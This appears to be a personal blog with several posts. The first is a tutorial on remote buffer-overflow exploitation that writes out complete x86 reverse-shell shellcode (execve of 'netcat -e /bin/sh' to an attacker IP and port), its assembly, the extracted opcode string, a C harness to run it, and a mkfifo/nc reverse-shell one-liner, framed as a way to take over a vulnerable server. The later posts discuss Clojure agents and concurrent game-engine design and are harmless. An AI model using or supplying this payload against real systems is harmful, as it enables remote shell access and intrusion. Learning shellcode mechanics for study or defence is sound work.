
Imagine you found a vulnerability in a web server and decided to take over that machine to do your dirty deeds. What do you do? Well, for starters, you have to figure out how to exploit the vulnerability at hand. In this article I will talk only about buffer overflows abused to inject a shellcode and execute arbitrary commands. There are other ways to gain access to a vulnerable remote machine, like incorrect parsing of cgi-bin requests, XSS attacks through unescaped HTML strings, SQL injection, and so on.

Most of all, I want to focus on the remote nature of the attack. Local buffer overflows are easy and there are countless other articles with detailed explanations on how to perform them (like this shameless self-plug from my old blog). Remote buffer overflows, though, are a whole other deal. Most of the time you are left stumbling in the dark trying to understand whether an exploit is even possible, how the memory of your target machine could be laid out, whether it has ASLR and stack guards… and on top of that you cannot just spawn a shell and call it a day. What good is spawning a local shell on a remote machine if you can't log into it?

The reverse bind of a remote shell

There are several ways to obtain access to a local shell over a remote connection. The most common of all is to open a known port with a TCP socket and bind its stdin/stdout/stderr to a newly forked shell. This way we can connect from our computer with a simple netcat command. However, this doesn't work well most of the time: most public-facing servers have only a small number of ports open to the outside world (like HTTP(S), FTP, SMTP, etc.) and the remaining inbound requests are usually filtered and dropped by iptables or firewalls.

The solution to this is to use a reverse bind for your local shell. A reverse bind is a simple operation that turns the client into a server and vice versa. Originally, you'd have opened a port on the target and waited for inbound connections (from your attacking machine). Reverse this and you'll have an open connection on your own machine waiting for the target machine to connect: the attacker becomes the receiver, waiting for some poor victim to fall into the trap.

Now, there are several shellcodes around the web for this specific type of attack; you can freely browse some of them at the shell-storm database. For me, some of them worked and others didn't, but it's always a good learning experience, so check it out. The topic for today is how to abuse netcat to do most of the job for us. I looked around the shallow web (first results of Google searches) and couldn't find any example of this, so… here it is!

The netcat -e command

We will assume our target has netcat installed on the machine. This is a strong assumption, and if the target is even a bit concerned about security there probably won't be a netcat binary around, but for the sake of learning let's assume this attack is applicable.

Traditional netcat and its GNU counterpart have a special parameter that can be passed to the binary: the -e flag. This flag executes the given program once the connection is established and binds the program's standard streams to the connection. Traditional netcat also has a -c flag which, for our purposes, does exactly the same, but since GNU netcat doesn't have it, we'll just use -e.

If we bind /bin/sh to netcat with -e, we are able to effectively pass our shell to the remote connection and have whoever is listening on the other side snoop into our machine (be careful when doing this!). Let’s give it a try:

  • In a shell on your machine run netcat -lvp 9999 to begin listening for inbound connections. This command is the base operation for any reverse bind shell attack; it can be your lifesaver.
  • In a separate shell, run netcat -e /bin/sh 127.0.0.1 9999

You should have received a connection in the first shell you opened. Go ahead and type some shell commands like ls or whoami to confirm that it is working. You can close the connection (from any end) with Ctrl-c when you’re done with it.

Note: The OpenBSD version of the netcat command has no -e/-c flags. As an alternative (taken from its man page) you can execute the following command: rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 9999 > /tmp/f. This, however, is verbose, error-prone and harder to run from an injected shellcode, so if your target uses this version it's probably better to pick a different shellcode.

Great! Now that we know what command we want to execute on the target machine, we just need to find a way to cram it into some assembly and compile it into our payload.

The assembly code

This is the assembly required to run our shellcode. I will explain in detail how it works. (Warning: it's Intel syntax.)
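
The listing below is reconstructed directly from the opcode string we extract later in this post, so it assembles byte-for-byte into that shellcode; the line numbers referenced in the explanation follow this listing:

  jmp short forward
  back:
  pop esi
  xor eax, eax
  mov byte [esi+11], al        ; terminate "/bin/netcat"
  mov byte [esi+14], al        ; terminate "-e"
  mov byte [esi+22], al        ; terminate "/bin/sh"
  mov byte [esi+38], al        ; terminate "127.127.127.127"
  mov byte [esi+43], al        ; terminate "9999"
  mov [esi+44], esi            ; AAAA <- address of "/bin/netcat"
  lea ebx, [esi+12]
  mov [esi+48], ebx            ; BBBB <- address of "-e"
  lea ebx, [esi+15]
  mov [esi+52], ebx            ; CCCC <- address of "/bin/sh"
  lea ebx, [esi+23]
  mov [esi+56], ebx            ; DDDD <- address of "127.127.127.127"
  lea ebx, [esi+39]
  mov [esi+60], ebx            ; EEEE <- address of "9999"
  mov [esi+64], eax            ; FFFF <- NULL, terminating the array
  mov al, 0xb                  ; syscall number of execve
  mov ebx, esi                 ; first argument: "/bin/netcat"
  lea ecx, [esi+44]            ; second argument: the array of pointers
  lea edx, [esi+64]            ; third argument: pointer to NULL (empty envp)
  int 0x80

  forward:
  call back
  db '/bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAABBBBCCCCDDDDEEEEFFFF'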

We want to execute the equivalent of the following C code:

  char *command[] = {"/bin/netcat", "-e", "/bin/sh", "127.127.127.127", "9999", NULL};
  execve(command[0], command, NULL);

To do so, we set up the following command string: "/bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAABBBBCCCCDDDDEEEEFFFF"

Ignoring the letters at the end (which I will explain later), you can see that our multiple strings are packed together into a single one, separated by a # character. This is because we cannot have null characters inside the actual shellcode: the vulnerable program typically copies our payload with a string function, so a null byte would terminate the copy early and truncate the shellcode. This is very common in shellcodes so I won't go into too much detail.

Regardless of where we are in memory when we run this code, we need to identify the address of the command string, so at line 1 we jump to the forward label (line 26) and then immediately call the back label. The call instruction is used to call a function: it pushes the return address (the address of the instruction right after the call) on top of the stack. But the address of the next instruction is exactly the address of our command string! (line 28)

Back at line 3, we pop that address into the esi register. Then we zero out the eax register (remember, we cannot just mov eax, 0 because zeroes are not allowed in our code) and start a patching operation to split the command string into multiple individual strings directly in memory.

Here's a picture to help explain the following process: [figure: String in Memory]

What we are doing between lines 5 and 9 is moving individual zeros (taken from the al register, which we just zeroed with the xor) into each location where an individual string in our command ends. This effectively substitutes each # with \0. After that, we want an array of addresses to our strings (terminated with a NULL) to pass as the second argument of execve(); this is where the trailing string of repeated letters comes into play. In memory, array elements are stored in contiguous locations, so we can abuse that contiguous region to store the address of each individual string.
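
To make the offsets concrete, here is the same patching laid out byte by byte (all offsets are relative to esi, the start of the command string; I computed them from the string layout above):

  offset  original contents    after patching
  0-10    "/bin/netcat"        unchanged
  11      '#'                  '\0'
  12-13   "-e"                 unchanged
  14      '#'                  '\0'
  15-21   "/bin/sh"            unchanged
  22      '#'                  '\0'
  23-37   "127.127.127.127"    unchanged
  38      '#'                  '\0'
  39-42   "9999"               unchanged
  43      '#'                  '\0'
  44-47   "AAAA"               address of esi+0  ("/bin/netcat")
  48-51   "BBBB"               address of esi+12 ("-e")
  52-55   "CCCC"               address of esi+15 ("/bin/sh")
  56-59   "DDDD"               address of esi+23 ("127.127.127.127")
  60-63   "EEEE"               address of esi+39 ("9999")
  64-67   "FFFF"               NULL (0x00000000)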

At line 10 we move the address of /bin/netcat into AAAA, then from line 11 to line 18 we do the same for each remaining string. Finally, at line 19 we store NULL (from eax) into FFFF to terminate our array.

At line 20 we prepare the execve system call. Syscalls invoked with int 0x80 expect their arguments in registers, so we store 0xb (the syscall number of execve) in eax, esi (the address of "/bin/netcat") in ebx, the address of our array of strings in ecx, and the address of the terminating NULL (an empty environment) in edx. We then trigger the system call and, if everything went according to plan, our shellcode gives us a nice reverse shell.

The devil is in the details

If you look closely, the shellcode uses 127.127.127.127 as the IP address and 9999 as the port. I chose that IP because it's a local IP (your own machine) with nice, even numbers. Usually you'll want to replace it with your own machine's public-facing IP. What you need to take care of is fixing all the offsets in the assembly code (as shown in the picture) if the length of your IP is different. This is a bothersome and error-prone operation, so be careful when rebuilding the shellcode and always test it locally to make sure it works.

Compiling and testing the shellcode

You should now have the assembly code stored in a file that we’ll call shell.asm. To compile it into binary/object code, we’ll use the following nasm command: nasm -felf32 -o shell.o shell.asm

We can inspect the binary with objdump -D and see our assembly code with the corresponding opcodes. We want to extract those opcodes and put them into a C string that we can execute from memory. There is a fancy one-liner script that can do that for us, taken from here:

for i in $(objdump -d shell.o -M intel | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo

This will print a string that looks like this: "\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c
\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e
\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62
\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32
\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41
\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46"

Now let’s create a small C program that can test our shellcode:
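
A minimal harness (a sketch of the classic test-wrapper pattern: store the opcodes in a buffer, then cast the buffer to a function pointer and call it) could look like this, using the byte string we just extracted:

  #include <stdio.h>
  #include <string.h>

  /* the opcodes extracted from shell.o with the objdump one-liner */
  unsigned char shellcode[] =
      "\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46"
      "\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f"
      "\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89"
      "\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf"
      "\xff\xff\xff"
      "/bin/netcat#-e#/bin/sh#127.127.127.127#9999#"
      "AAAABBBBCCCCDDDDEEEEFFFF";

  int main(void)
  {
      printf("shellcode length: %d\n", (int)strlen((char *)shellcode));
      /* jump into the buffer: this only works because we compile with
         the security flags turned off (see the gcc command below) */
      int (*run)(void) = (int (*)(void))shellcode;
      run();
      return 0;
  }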

Let's compile this. We'll need to set the proper compilation flags to turn off the security measures that would otherwise just make us segfault (they are usually enabled by default nowadays, rightfully so). On a 64-bit machine you'll also need -m32, since this is 32-bit code.

gcc shellcode.c -fno-stack-protector -z execstack -o shellcode

Spawn another shell with netcat -lvp 9999 and run ./shellcode. If all went well, you should have your reverse shell running: the exploit worked.

[figure: Shellcode worked]

This is all for now, thank you for reading, happy hacking!

Cheers,
Morg.




Time model in a concurrent game engine

“Everything changes and nothing remains still and you cannot step twice into the same stream” - Heraclitus

Every game has a world filled with entities. All those entities contain data that exists and mutates over time. The only way to read such data is to take a snapshot of the world, a photo of the current state of an entity, and then operate on it without caring about anything else. Unfortunately, most mainstream concurrent designs are built on the flawed premise of mutual exclusion: the idea that critical sections must be locked to prevent simultaneous access. Other paradigms use an actor-based model where messages are sent to a thread-safe interface that replies with the state in a thread-safe manner.

Both of these approaches, unfortunately, do not scale to large applications with hundreds (or thousands?) of concurrent accesses. What's even worse is that the whole world slows down the more threads you add to the equation: when an actor spends time replying to dozens of requests, its thread's timeslice becomes smaller and, under a soft-realtime constraint like a videogame's, this leads to funny and frustrating bugs. The same idea applies to locking and mutual exclusion: high contention on resources, especially with ill-defined lock hierarchies, can also cause deadlocks and stalls.

Clojure

Enter Clojure, a possible solution to all these problems. Clojure is a Lisp dialect that runs on the JVM. There are also ports for the CLR and JavaScript (ClojureScript) and various other in-development implementations, but that is irrelevant to this post.

Clojure is built and designed from the ground up with a focus on concurrency and data immutability. Its time model is very peculiar compared to traditional paradigms. Thanks to its persistent, immutable data structures, it is (almost) always possible to read any variable in the program without blocking and without observing inconsistent state. It also sports an impressive range of concurrency primitives (Refs, Vars, Agents and Atoms) which make parallel development trivial and straightforward.

This post is not meant as an insight into Clojure's design; however, a superficial explanation of the Clojure concurrency magic is in order: the trick consists of separating identities from values. It really is that simple, especially when the whole environment is immutable and persistent. The only mutable things in Clojure (leaving out the Java-related libraries) are transients and the reference types mentioned in the previous paragraph. Whenever a new variable is defined, it is paired with a value in the environment. A variable named foo whose assigned value is, let's say, "bar" is not the same thing as the value "bar": foo is the identity, and it currently refers to the value "bar". If that variable is immutable, then foo will always refer to "bar" in that context and nothing will change. We can then read foo from any thread without consistency problems, because the value bound to that identifier will never change.
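
A quick REPL sketch of this idea (foo and names are throwaway examples of mine):

  (def foo "bar")        ; the identity foo now refers to the value "bar"
  (def names ["alice"])  ; a persistent, immutable vector
  (conj names "bob")     ;=> ["alice" "bob"], a brand new value...
  names                  ;=> ["alice"], ...the original is untouched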

To allow stateful, mutable data while sticking to this principle, we just add a new layer of indirection. Clojure's reference types are defined as an (identity, container) pair where the container itself is just a box whose contents can change through a specific thread-safe function; which function depends on the reference type being used. Inside this mutable container there is immutable (and persistent) data, which is the actual state/value of the variable. Changing what's inside the container is always thread-safe through its concurrency interface. Reading the value inside the container is called dereferencing and is a constant-time operation that does not block or stall any other pending concurrent operation, relieving the system from the stress of having to send and receive messages to and from black-boxed actors. It is similar in spirit to monads, but arguably easier to work with.
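
Here is a minimal sketch with an atom, the simplest of the reference types (the position map is a made-up example):

  (def position (atom {:x 0 :y 0}))  ; identity -> container -> immutable value

  @position                          ;=> {:x 0, :y 0}, dereferencing never blocks
  (swap! position update :x inc)     ; thread-safe mutation through the atom's interface
  @position                          ;=> {:x 1, :y 0}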

Here's a shamelessly stolen explanatory picture about the difference between mutable state and immutable identity, taken from this page which, admittedly, does a much more thorough and better job of explaining Clojure concurrency than I do.

Agents

Going back to game engine design, there is one reference type in Clojure that meets almost all the requirements for our entities: agents. An agent is a container that provides independent and asynchronous change of its state.

  • Independent - It does not care about other agents or reference types in the environment and operates only on its own internal data.
  • Asynchronous - It does not depend on operations carried out on other agents or reference types in the environment; its succession of mutations in time is unrelated to other reference types. Sending it a change is a fire-and-forget operation.

Agents take an approach similar to the actor model, but with a fundamental difference: the agent itself is data, and it receives functions that transform that data. Unlike an actor, which runs a receive-message loop dispatching on various commands (even just to read!), an agent simply reads from a queue of functions, applies each function to its current state on a pool thread, and stores the result as its new state.

To read a snapshot of the state of any agent in our game world, all we need to do is dereference it: a constant-time operation that does not contend for resources or interfere with other threads. To change an agent we send it a function that is applied to the agent's state (for example, increasing the X,Y coordinates of a moving entity). Under the hood, the Clojure implementation makes sure this is all thread-safe. Without delving into too many implementation details: agents share a managed thread pool of N+2 threads (where N is the number of cores available on your CPU), managed internally by a Java ExecutorService (which can be swapped out for tweaking purposes).
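
A sketch of what this could look like for a game entity (the entity data is made up for illustration; this is not code from the actual engine):

  (def enemy (agent {:x 0.0 :y 0.0 :hp 100}))

  ;; a pure function from the old state to the new state
  (defn move [state dx dy]
    (-> state
        (update :x + dx)
        (update :y + dy)))

  (send enemy move 1.5 0.0)  ; fire-and-forget: queued, applied on a pool thread

  @enemy                     ; non-blocking snapshot of the current state
  (await enemy)              ; demonstration only: wait for the queue to drain
  @enemy                     ;=> {:x 1.5, :y 0.0, :hp 100}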

What is especially useful about agents is that the order of the asynchronous functions is always coherent: if you send two functions in succession to an agent, you are guaranteed that the first is applied before the second, in FIFO order.
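
For example, two sends in a row always yield the same deterministic result (counter is just a throwaway example):

  (def counter (agent 0))
  (send counter + 1)   ; applied first:  (+ 0 1)  => 1
  (send counter * 10)  ; applied second: (* 1 10) => 10
  (await counter)
  @counter             ;=> always 10, never 1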

Unfortunately, this approach still has one visible flaw that needs to be taken care of: what about coordinated updates between agents? More often than not in a game engine there are hierarchies of entities and sequences of updates that need to be fast and responsive. An example: if the player attacks an enemy, we want to tell the enemy to instantly play the hurt animation, without waiting for that agent's thread to be scheduled and updated who-knows-when, especially if the player needs to act differently depending on the outcome of the action (is the enemy dead? did it parry? did it counter-attack?). Luckily for us there is a solution to this issue, and it will be outlined in the next post.

Morg.




Design Theory

Before delving into actual implementation and technical details, let's take a moment to reflect on the possible design of a fully parallel and concurrent game engine and what could be a simple development model for it.

We want to achieve the following goals:

  • Easy to understand
  • Easy to develop for
  • Entities are loosely coupled with each other
  • No need to think about threads

There are various paths a developer can take to reach the state of a fully concurrent game engine, but I feel it is of the utmost importance to keep everything as simple as possible. It is no use having a massive engine if nobody can understand it. It would eventually become frustrating and too hard to maintain, lose popularity and become yet another stigma in the history of multithreaded game development (I actually love the Cell processor, don't get me wrong).

Many people don't fully realize it, but we live in a concurrent world. If we just look around, we can see a lot of tiny processors everywhere: they are called humans. How do they do it? How do they move around such a massively complex world without synchronizing with each other, without having to understand everything before taking the next step in the ginormous computation of this universe?

If you think about it, the solution is actually very simple: they don't. There is no need to schedule their lives in time slices to share with everybody else, dictated by a globally synchronized clock. Imagine you are driving on a highway with dozens of cars in each lane. There are cars in front of you, cars behind you, cars at your sides. Traffic is a very complex system, a case study for researchers all over the world. Imagine that: we are a part of it! We, ourselves, are creating a vastly complex system and we don't even realize it. And yet, what do we do while we drive? We just focus on the road. We have a target in mind; we don't care about what happens around us, we only care about the cars directly in front of and behind us (and the close surroundings, drive safely!). We don't need to know that a few miles away Fred is watching TV shows on his brand new 4K screen, why would that matter to us at all?

There is also another really important point to make: we cannot stop the world around us whenever we interact with it. We do not control the car behind us. You want to read that billboard? Welp, too fast, you could only glance at it once and now it's gone. You don't lock the world in place just for your own comfort. Imagine everybody locking everybody else: the whole system would grind to a halt, it would be unmanageable. Yet this is exactly what a lot of multithreaded systems resort to, and locking the world every time you interact with something is not the solution.

Let’s summarize this, there are two fundamental key points to remember:

  • Entities care only about themselves
  • The world must never stop running

The first point is not actually that hard to achieve; many game systems have already been developed with this in mind. Any classical Actor/Entity based system deals with entities being their own little world. There can be various grades of technical in-breeding in these engines: some go with a fully compartmentalized, heavily OOP-driven approach while others prefer data-driven development, thinner and more spread out. Modern engines seem to prefer the latter approach, but the former certainly has its benefits too.

Towards a (not so) event-driven system

What we really want, though, is what people call an event-driven system. Traditionally in such systems, entities are blocks of code designed to respond to events and interact with the world via callbacks. This starts out as a very elegant model but, in my personal experience, it quickly becomes hard to maintain and reason about (opinions may vary!). Did this event come from that entity or the other one? Which event was fired first? Should I reply to this event before or after the end of this update loop?

In my opinion, the problem with event-driven systems is the failure to take them to the next level of abstraction. Developers are still tied to a classic update loop firing events at X frames per second. We need this because we need to provide a temporal ordering of actions in our game engine: we certainly don't want our ball to pass through a brick in Breakout simply because the "move" event was fired before the "collision" event. It would be disastrous. I have yet to see an accident prevented by a car passing unscathed through another one.

What we ultimately need is a way to provide asynchronous computation while maintaining the order of operations; we need to abstract away from the traditional timed update loop. Provide the entities with the right behaviors and let them do their job: they surely know how to handle it better than we do, as long as the system stays consistent.

For this purpose, we will from now on refer to entities as agents; the reasoning behind this will become clearer in the next post.

Stop the world, I need to pee

The second point we need to consider is stopping the world. In a classic concurrent environment we need to make sure the shared data we are accessing from one thread stays in a consistent state throughout the whole computation, or problems arise. This means that I need to prevent other threads from messing with my data for the quantum of time I need to operate on it myself. This is called mutual exclusion. Let me be straight with you: mutual exclusion is bad. It implies some privileged flow of execution that overtakes other threads and expects them to stop for it to continue. It is unreasonable, as I mentioned earlier. You should not expect traffic to slow down just because you want to take another look at the cutie waiting at the crossing light.

How do we implement this? How can I mingle with data in a fully concurrent environment without blocking others or fearing that my data suddenly becomes corrupt and unusable? There is a solution, and it is what I will propose in my next post.

Morg.




Introduction

Game engine development is a very interesting and complex subject for game developers. There is something incredibly appealing in trying to cram a highly modular, flexible and yet fast design into the quasi-realtime requirements of a game engine.

There is really only so much you can do inside a tiny quantum of time, as tiny as 16.7 ms for most requirements. Even when halving the framerate, to ~33 ms, you're still going to hit a limit on what you can do. There are a lot of ways to deal with timestepping and the separation of rendering and updating, but this is not the place to talk about them. What I want to talk about, however, is concurrency problems.

In 2013 (it's been a while, actually) processors had pretty much hit their physical limit as far as computational speed goes. Engineers have been coming up with the most convoluted solutions to squeeze even more juice out of a small die, but the common trend is to go with more cores. If you cannot get a single core to run faster, why not just double it? Double the cores means double the performance! (It's not actually true.) The line of reasoning is sound, though: with more cores your machine can handle more threads, which are parallel flows of execution, gaining performance from parallelism.

How game development relates to multiple cores, though, is a totally different story. A lot of cores means you can run a lot of applications at the same time better than you would with a single core, and as long as each application lives in its own world and doesn't interact with the others, you can expect good speedups. As any game developer can attest, this is not the case for game engines. A videogame is a very complex system composed of a high number of entities all operating together, synchronized and aware of the world, requiring a single timestep and multiple computations applied to more than one entity at the same time. This is a nightmare for multithreading.

I won't go into detail about the issues of multithreading, but it is important to realize that the fundamental problem with highly synchronized multithreaded systems is state. The moment two threads try to access the same shared resource at the same time, the consistency of that resource's state is at risk, and this should always be kept in mind when designing a multithreaded game engine. Another substantial problem has to do with the update rate of entities: one entity should not be allowed to be faster than the others, it should not "get ahead" of the group, and with concurrency in the mix you need a lot of over-engineering to solve this, up to the point of losing performance because of it.

On the one hand, concurrent game engines seem impossible to achieve; on the other hand, there are various portions that can be safely parallelized without incurring the wrath of the Nondeterministic Gods. Modern AAA engines (like the Unreal Engine or the Doom 3 engine) already separate some portions of their code into different threads. The most common approaches involve having the rendering, physics, input/networking and AI each on their own thread, with successive synchronized update cycles applied to the whole game world.

How to further parallelize the job of a game engine is still a very hot topic of research in the game industry with, unfortunately, little to no actual solution readily available to the public. Wouldn’t it be great to just be able to develop a game with little to no concern about the underlying multithreaded architecture or CPU structure while still gaining performance boosts from multiple cores?

With this series of blog posts I am going to provide a rationale and a concrete design for my game engine idea, the Cloister Core engine: a fully concurrent game engine I am developing alongside these posts. I don't know where this journey will take me, nor whether this is a sensible design, but I think it's going to be fun nonetheless.

Morg.